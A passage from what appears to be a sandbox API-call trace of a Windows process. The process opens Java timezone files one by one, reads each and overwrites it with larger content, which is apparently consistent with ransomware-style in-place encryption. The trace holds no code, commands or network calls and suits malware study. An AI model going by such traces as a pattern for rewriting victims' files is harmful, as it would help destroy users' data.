0x0 [0129.003] ReleaseMutex (hMutex=0x168) returned 1 [0129.004] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="El_Aaiun", cchWideChar=8, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8 [0129.004] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="El_Aaiun", cchWideChar=8, lpMultiByteStr=0x1f733cc, cbMultiByte=8, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="El_Aaiun", lpUsedDefaultChar=0x0) returned 8 [0129.004] ReadFile (in: hFile=0x1d4, lpBuffer=0x1f9fb88, nNumberOfBytesToRead=0x4d, lpNumberOfBytesRead=0x2e9f2bc, lpOverlapped=0x0 | out: lpBuffer=0x1f9fb88*, lpNumberOfBytesRead=0x2e9f2bc*=0x4d, lpOverlapped=0x0) returned 1 [0129.005] SetFilePointer (in: hFile=0x1d4, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2e9f300*=0) returned 0x0 [0129.005] WriteFile (in: hFile=0x1d4, lpBuffer=0x26cf048*, nNumberOfBytesToWrite=0x5d5, lpNumberOfBytesWritten=0x2e9f2d0, lpOverlapped=0x0 | out: lpBuffer=0x26cf048*, lpNumberOfBytesWritten=0x2e9f2d0*=0x5d5, lpOverlapped=0x0) returned 1 [0129.005] CloseHandle (hObject=0x1d4) returned 1 [0129.005] CreateFileW (lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Africa\\Kigali" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\africa\\kigali"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1d4 [0129.006] SetFilePointer (in: hFile=0x1d4, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2e9f8c0*=0) returned 0x0 [0129.006] SetFilePointer (in: hFile=0x1d4, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2e9f8c0*=0) returned 0x41 [0129.006] SetFilePointer (in: hFile=0x1d4, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2e9f8c0*=0) returned 0x0 [0129.006] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0129.006] ReleaseMutex (hMutex=0x168) returned 1 [0129.006] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Kigali", cchWideChar=6, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 6 [0129.006] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Kigali", cchWideChar=6, lpMultiByteStr=0x1f7ace4, cbMultiByte=6, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Kigali", lpUsedDefaultChar=0x0) returned 6 [0129.006] ReadFile (in: hFile=0x1d4, lpBuffer=0x1fc21d8, nNumberOfBytesToRead=0x41, lpNumberOfBytesRead=0x2e9f2bc, lpOverlapped=0x0 | out: lpBuffer=0x1fc21d8*, lpNumberOfBytesRead=0x2e9f2bc*=0x41, lpOverlapped=0x0) returned 1 [0129.007] SetFilePointer (in: hFile=0x1d4, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2e9f300*=0) returned 0x0 [0129.007] WriteFile (in: hFile=0x1d4, lpBuffer=0x1eff4b8*, nNumberOfBytesToWrite=0x5c9, lpNumberOfBytesWritten=0x2e9f2d0, lpOverlapped=0x0 | out: lpBuffer=0x1eff4b8*, lpNumberOfBytesWritten=0x2e9f2d0*=0x5c9, lpOverlapped=0x0) returned 1 [0129.007] CloseHandle (hObject=0x1d4) returned 1 [0129.008] CreateFileW (lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Africa\\Malabo" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\africa\\malabo"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1d4 [0129.009] SetFilePointer (in: hFile=0x1d4, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2e9f8c0*=0) returned 0x0 [0129.009] SetFilePointer (in: hFile=0x1d4, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2e9f8c0*=0) returned 0x4d [0129.010] SetFilePointer (in: hFile=0x1d4, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2e9f8c0*=0) returned 0x0 [0129.010] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0129.010] ReleaseMutex (hMutex=0x168) returned 1 [0129.010] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Malabo", cchWideChar=6, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 6 [0129.010] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Malabo", cchWideChar=6, lpMultiByteStr=0x1f7ace4, cbMultiByte=6, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Malabo", lpUsedDefaultChar=0x0) returned 6 [0129.010] ReadFile (in: hFile=0x1d4, lpBuffer=0x1f9fb88, nNumberOfBytesToRead=0x4d, lpNumberOfBytesRead=0x2e9f2bc, lpOverlapped=0x0 | out: lpBuffer=0x1f9fb88*, lpNumberOfBytesRead=0x2e9f2bc*=0x4d, lpOverlapped=0x0) returned 1 [0129.011] SetFilePointer (in: hFile=0x1d4, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2e9f300*=0) returned 0x0 [0129.011] WriteFile (in: hFile=0x1d4, lpBuffer=0x26cf048*, nNumberOfBytesToWrite=0x5d5, lpNumberOfBytesWritten=0x2e9f2d0, lpOverlapped=0x0 | out: lpBuffer=0x26cf048*, lpNumberOfBytesWritten=0x2e9f2d0*=0x5d5, lpOverlapped=0x0) returned 1 [0129.011] CloseHandle (hObject=0x1d4) returned 1 [0129.011] CreateFileW (lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Africa\\Niamey" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\africa\\niamey"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1d4 [0129.015] SetFilePointer (in: hFile=0x1d4, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2e9f8c0*=0) returned 0x0 [0129.015] SetFilePointer (in: hFile=0x1d4, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2e9f8c0*=0) returned 0x59 [0129.015] SetFilePointer (in: hFile=0x1d4, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2e9f8c0*=0) returned 0x0 [0129.015] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0129.015] ReleaseMutex (hMutex=0x168) returned 1 [0129.015] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Niamey", cchWideChar=6, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 6 [0129.016] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Niamey", cchWideChar=6, lpMultiByteStr=0x1f7ace4, cbMultiByte=6, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Niamey", lpUsedDefaultChar=0x0) returned 6 [0129.016] ReadFile (in: hFile=0x1d4, lpBuffer=0x1fbab68, nNumberOfBytesToRead=0x59, lpNumberOfBytesRead=0x2e9f2bc, lpOverlapped=0x0 | out: lpBuffer=0x1fbab68*, lpNumberOfBytesRead=0x2e9f2bc*=0x59, lpOverlapped=0x0) returned 1 [0129.017] SetFilePointer (in: hFile=0x1d4, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2e9f300*=0) returned 0x0 [0129.017] WriteFile (in: hFile=0x1d4, lpBuffer=0x26cf048*, nNumberOfBytesToWrite=0x5e1, lpNumberOfBytesWritten=0x2e9f2d0, lpOverlapped=0x0 | out: lpBuffer=0x26cf048*, lpNumberOfBytesWritten=0x2e9f2d0*=0x5e1, lpOverlapped=0x0) returned 1 [0129.017] CloseHandle (hObject=0x1d4) returned 1 [0129.017] CreateFileW (lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Adak" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\america\\adak"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1d4 [0129.309] SetFilePointer (in: hFile=0x1d4, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2e9f8c0*=0) returned 0x0 [0129.309] SetFilePointer (in: hFile=0x1d4, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2e9f8c0*=0) returned 0x4c8 [0129.309] SetFilePointer (in: hFile=0x1d4, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2e9f8c0*=0) returned 0x0 [0129.309] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0129.309] ReleaseMutex (hMutex=0x168) returned 1 [0129.309] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Adak", cchWideChar=4, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 4 [0129.309] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Adak", cchWideChar=4, lpMultiByteStr=0x1f7ace4, cbMultiByte=4, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Adak", lpUsedDefaultChar=0x0) returned 4 [0129.309] ReadFile (in: hFile=0x1d4, lpBuffer=0x1ea3978, nNumberOfBytesToRead=0x4c8, lpNumberOfBytesRead=0x2e9f2bc, lpOverlapped=0x0 | out: lpBuffer=0x1ea3978*, lpNumberOfBytesRead=0x2e9f2bc*=0x4c8, lpOverlapped=0x0) returned 1 [0129.311] SetFilePointer (in: hFile=0x1d4, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2e9f300*=0) returned 0x0 [0129.312] WriteFile (in: hFile=0x1d4, lpBuffer=0x1ea9ab8*, nNumberOfBytesToWrite=0xa50, lpNumberOfBytesWritten=0x2e9f2d0, lpOverlapped=0x0 | out: lpBuffer=0x1ea9ab8*, lpNumberOfBytesWritten=0x2e9f2d0*=0xa50, lpOverlapped=0x0) returned 1 [0129.312] CloseHandle (hObject=0x1d4) returned 1 [0129.312] CreateFileW (lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Argentina\\Jujuy" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\america\\argentina\\jujuy"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x204 [0129.317] SetFilePointer (in: hFile=0x204, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2e9f8c0*=0) returned 0x0 [0129.318] SetFilePointer (in: hFile=0x204, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2e9f8c0*=0) returned 0x215 [0129.318] SetFilePointer (in: hFile=0x204, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2e9f8c0*=0) returned 0x0 [0129.318] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0129.318] ReleaseMutex (hMutex=0x168) returned 1 [0129.318] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Jujuy", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0129.318] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Jujuy", cchWideChar=5, lpMultiByteStr=0x1f7ace4, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Jujuy", lpUsedDefaultChar=0x0) returned 5 [0129.318] ReadFile (in: hFile=0x204, lpBuffer=0x1f25a38, nNumberOfBytesToRead=0x215, lpNumberOfBytesRead=0x2e9f2bc, lpOverlapped=0x0 | out: lpBuffer=0x1f25a38*, lpNumberOfBytesRead=0x2e9f2bc*=0x215, lpOverlapped=0x0) returned 1 [0129.320] SetFilePointer (in: hFile=0x204, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2e9f300*=0) returned 0x0 [0129.320] WriteFile (in: hFile=0x204, lpBuffer=0x286cf78*, nNumberOfBytesToWrite=0x79d, lpNumberOfBytesWritten=0x2e9f2d0, lpOverlapped=0x0 | out: lpBuffer=0x286cf78*, lpNumberOfBytesWritten=0x2e9f2d0*=0x79d, lpOverlapped=0x0) returned 1 [0129.320] CloseHandle (hObject=0x204) returned 1 [0129.320] CreateFileW (lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Argentina\\Ushuaia" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\america\\argentina\\ushuaia"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x204 [0129.321] SetFilePointer (in: hFile=0x204, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2e9f8c0*=0) returned 0x0 [0129.321] SetFilePointer (in: hFile=0x204, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2e9f8c0*=0) returned 0x225 [0129.321] SetFilePointer (in: hFile=0x204, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2e9f8c0*=0) returned 0x0 [0129.321] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0129.321] ReleaseMutex (hMutex=0x168) returned 1 [0129.322] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Ushuaia", cchWideChar=7, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 7 [0129.322] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Ushuaia", cchWideChar=7, lpMultiByteStr=0x1f7ace4, cbMultiByte=7, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Ushuaia", lpUsedDefaultChar=0x0) returned 7 [0129.322] ReadFile (in: hFile=0x204, lpBuffer=0x1f25a38, nNumberOfBytesToRead=0x225, lpNumberOfBytesRead=0x2e9f2bc, lpOverlapped=0x0 | out: lpBuffer=0x1f25a38*, lpNumberOfBytesRead=0x2e9f2bc*=0x225, lpOverlapped=0x0) returned 1 [0129.323] SetFilePointer (in: hFile=0x204, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2e9f300*=0) returned 0x0 [0129.323] WriteFile (in: hFile=0x204, lpBuffer=0x286cf78*, nNumberOfBytesToWrite=0x7ad, lpNumberOfBytesWritten=0x2e9f2d0, lpOverlapped=0x0 | out: lpBuffer=0x286cf78*, lpNumberOfBytesWritten=0x2e9f2d0*=0x7ad, lpOverlapped=0x0) returned 1 [0129.324] CloseHandle (hObject=0x204) returned 1 [0129.324] CreateFileW (lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Belize" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\america\\belize"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x204 [0129.325] SetFilePointer (in: hFile=0x204, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2e9f8c0*=0) returned 0x0 [0129.325] SetFilePointer (in: hFile=0x204, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2e9f8c0*=0) returned 0x201 [0129.325] SetFilePointer (in: hFile=0x204, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2e9f8c0*=0) returned 0x0 [0129.325] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0129.325] ReleaseMutex (hMutex=0x168) returned 1 [0129.325] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Belize", cchWideChar=6, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 6 [0129.325] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Belize", cchWideChar=6, lpMultiByteStr=0x1f7ace4, cbMultiByte=6, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Belize", lpUsedDefaultChar=0x0) returned 6 [0129.325] ReadFile (in: hFile=0x204, lpBuffer=0x1f5cf28, nNumberOfBytesToRead=0x201, lpNumberOfBytesRead=0x2e9f2bc, lpOverlapped=0x0 | out: lpBuffer=0x1f5cf28*, lpNumberOfBytesRead=0x2e9f2bc*=0x201, lpOverlapped=0x0) returned 1 [0129.326] SetFilePointer (in: hFile=0x204, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2e9f300*=0) returned 0x0 [0129.326] WriteFile (in: hFile=0x204, lpBuffer=0x286cf78*, nNumberOfBytesToWrite=0x789, lpNumberOfBytesWritten=0x2e9f2d0, lpOverlapped=0x0 | out: lpBuffer=0x286cf78*, lpNumberOfBytesWritten=0x2e9f2d0*=0x789, lpOverlapped=0x0) returned 1 [0129.327] CloseHandle (hObject=0x204) returned 1 [0129.327] CreateFileW (lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Caracas" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\america\\caracas"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1d4 [0129.330] SetFilePointer (in: hFile=0x1d4, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2e9f8c0*=0) returned 0x0 [0129.330] SetFilePointer (in: hFile=0x1d4, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2e9f8c0*=0) returned 0x55 [0129.330] SetFilePointer (in: hFile=0x1d4, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2e9f8c0*=0) returned 0x0 [0129.330] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0129.330] ReleaseMutex (hMutex=0x168) returned 1 [0129.331] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Caracas", cchWideChar=7, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 7 [0129.331] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Caracas", cchWideChar=7, lpMultiByteStr=0x1f7ace4, cbMultiByte=7, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Caracas", lpUsedDefaultChar=0x0) returned 7 [0129.331] ReadFile (in: hFile=0x1d4, lpBuffer=0x1fbab68, nNumberOfBytesToRead=0x55, lpNumberOfBytesRead=0x2e9f2bc, lpOverlapped=0x0 | out: lpBuffer=0x1fbab68*, lpNumberOfBytesRead=0x2e9f2bc*=0x55, lpOverlapped=0x0) returned 1 [0129.332] SetFilePointer (in: hFile=0x1d4, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2e9f300*=0) returned 0x0 [0129.332] WriteFile (in: hFile=0x1d4, lpBuffer=0x26cf048*, nNumberOfBytesToWrite=0x5dd, lpNumberOfBytesWritten=0x2e9f2d0, lpOverlapped=0x0 | out: lpBuffer=0x26cf048*, lpNumberOfBytesWritten=0x2e9f2d0*=0x5dd, lpOverlapped=0x0) returned 1 [0129.332] CloseHandle (hObject=0x1d4) returned 1 [0129.333] CreateFileW (lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Curacao" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\america\\curacao"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1d4 [0129.334] SetFilePointer (in: hFile=0x1d4, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2e9f8c0*=0) returned 0x0 [0129.334] SetFilePointer (in: hFile=0x1d4, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2e9f8c0*=0) returned 0x4d [0129.334] SetFilePointer (in: hFile=0x1d4, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2e9f8c0*=0) returned 0x0 [0129.334] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0129.334] ReleaseMutex (hMutex=0x168) returned 1 [0129.335] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Curacao", cchWideChar=7, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 7 [0129.335] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Curacao", cchWideChar=7, lpMultiByteStr=0x1f7ace4, cbMultiByte=7, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Curacao", lpUsedDefaultChar=0x0) returned 7 [0129.335] ReadFile (in: hFile=0x1d4, lpBuffer=0x1f9fd08, nNumberOfBytesToRead=0x4d, lpNumberOfBytesRead=0x2e9f2bc, lpOverlapped=0x0 | out: lpBuffer=0x1f9fd08*, lpNumberOfBytesRead=0x2e9f2bc*=0x4d, lpOverlapped=0x0) returned 1 [0129.336] SetFilePointer (in: hFile=0x1d4, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2e9f300*=0) returned 0x0 [0129.336] WriteFile (in: hFile=0x1d4, lpBuffer=0x26cf048*, nNumberOfBytesToWrite=0x5d5, lpNumberOfBytesWritten=0x2e9f2d0, lpOverlapped=0x0 | out: lpBuffer=0x26cf048*, lpNumberOfBytesWritten=0x2e9f2d0*=0x5d5, lpOverlapped=0x0) returned 1 [0129.336] CloseHandle (hObject=0x1d4) returned 1 [0129.336] CreateFileW (lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Eirunepe" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\america\\eirunepe"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1d4 [0129.341] SetFilePointer (in: hFile=0x1d4, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2e9f8c0*=0) returned 0x0 [0129.341] SetFilePointer (in: hFile=0x1d4, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2e9f8c0*=0) returned 0x141 [0129.341] SetFilePointer (in: hFile=0x1d4, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2e9f8c0*=0) returned 0x0 [0129.341] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0129.341] ReleaseMutex (hMutex=0x168) returned 1 [0129.341] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Eirunepe", cchWideChar=8, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8 [0129.341] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Eirunepe", cchWideChar=8, lpMultiByteStr=0x1f7362c, cbMultiByte=8, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Eirunepe", lpUsedDefaultChar=0x0) returned 8 [0129.342] ReadFile (in: hFile=0x1d4, lpBuffer=0x268b7c8, nNumberOfBytesToRead=0x141, lpNumberOfBytesRead=0x2e9f2bc, lpOverlapped=0x0 | out: lpBuffer=0x268b7c8*, lpNumberOfBytesRead=0x2e9f2bc*=0x141, lpOverlapped=0x0) returned 1 [0129.343] SetFilePointer (in: hFile=0x1d4, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2e9f300*=0) returned 0x0 [0129.343] WriteFile (in: hFile=0x1d4, lpBuffer=0x286cf78*, nNumberOfBytesToWrite=0x6c9, lpNumberOfBytesWritten=0x2e9f2d0, lpOverlapped=0x0 | out: lpBuffer=0x286cf78*, lpNumberOfBytesWritten=0x2e9f2d0*=0x6c9, lpOverlapped=0x0) returned 1 [0129.343] CloseHandle (hObject=0x1d4) returned 1 [0129.343] CreateFileW (lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Guadeloupe" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\america\\guadeloupe"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1d4 [0129.344] SetFilePointer (in: hFile=0x1d4, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2e9f8c0*=0) returned 0x0 [0129.344] SetFilePointer (in: hFile=0x1d4, 